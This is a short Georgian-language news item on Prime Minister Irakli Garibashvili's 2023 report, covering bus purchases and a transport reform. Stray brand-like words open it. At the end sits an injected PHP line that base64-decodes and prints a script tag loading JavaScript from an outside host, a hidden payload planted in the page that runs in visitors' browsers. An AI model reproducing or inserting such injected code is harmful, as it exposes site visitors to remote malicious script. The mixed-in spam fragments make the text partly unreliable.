celsiusi
ავერსი შნაიდერი

წელს უკვე შევიძინეთ 150 ავტობუსი, ნაგავმზიდები და ა.შ. დაგეგმილი არის სხვა უფრო მცირე ავტობუსების შეძენაც. ჩვენ ასევე დავიწყეთ შიდა საავტომობილო სამგზავრო გადაყვანის რეფორმირება წელს და გვინდა, რომ 2024-2025 წლებში დასრულდეს ეს რეფორმაც, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა მთავრობის მუშაობის 2023 წლის ანგარიშის წარდგენისას განაცხადა.

როგორც პრემიერმა აღნიშნა, შედეგად გაუმჯობესდება მგზავრთა გადაყვანის მომსახურების ხარისხი.

„კონკურენტუნარიანი გარემოს შექმნა და უსაფრთხოების დონის ამაღლება არის ერთ-ერთი მთავარი მიზანი ამ რეფორმის. პარლამენტში არის უკვე წარდგენილი ეს პაკეტი. რეგიონებში აქტიურად დავიწყეთ თანამედროვე, ევრო-5-ის სტანდარტის ავტობუსების შეძენა, წელს უკვე შევიძინეთ 150 ავტობუსი, ნაგავმზიდები და ა.შ. ასევე დაგეგმილია სხვა უფრო მცირე ავტობუსების შეძენაც. ჩვენ გვინდა, რომ სრულად ჩავანაცვლოთ ეს ავტობუსები, სამარშრუტო ტაქსები და ჩვენმა მოქალაქეებმა იმგზავრონ კომფორტული ტრანსპორტით“, – აღნიშნა ირაკლი ღარიბაშვილმა.

505
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");